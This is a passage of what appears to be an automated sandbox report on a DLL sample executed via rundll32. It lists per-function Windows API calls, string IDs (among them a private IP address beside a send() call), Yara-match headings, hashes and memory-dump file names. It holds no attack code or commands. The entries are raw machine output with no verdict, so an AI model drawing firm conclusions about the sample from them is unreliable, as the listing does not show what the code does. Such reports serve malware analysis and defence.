                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                      • _memset.LIBCMT ref: 10020424
                                                                                                                      • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 289641511-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                        • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                        • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                        • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                        • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                      • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                        • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                      • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2731880238-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                      • SetWindowLongA.USER32 ref: 10012989
                                                                                                                        • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LongMenuWindow$AppendSystem
                                                                                                                      • String ID: 192.168.3.85$Message
                                                                                                                      • API String ID: 4121476972-856608562
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • _strcat.LIBCMT ref: 1001310A
                                                                                                                        • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 16450322-3653984579
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                        • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                        • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                      • API String ID: 3274081130-63838506
                                                                                                                      • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                      • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                      • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                      • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                      • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2459298410-0
                                                                                                                      • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                      • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                      • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                      • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 365290523-0
                                                                                                                      • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                      • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$DesktopVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1055025324-0
                                                                                                                      • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                      • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002C6E7
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26245289-0
                                                                                                                      • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                      • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                      • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetDC.USER32(?), ref: 1002658E
                                                                                                                      • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                      • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3511876931-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __msize_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1288803200-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3998274959-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                        • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                        • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                      • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532457625-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                        • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                      • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                      • _strtol.LIBCMT ref: 10022CB5
                                                                                                                      • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                        • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211061542-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDestroyFreeSafeTask
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253174383-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2161412305-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1615547351-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                        • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                      • __strdup.LIBCMT ref: 1001514C
                                                                                                                      • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4206445780-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                      • _swprintf.LIBCMT ref: 10017768
                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                      Similarity
                                                                                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210924919-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354205298-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
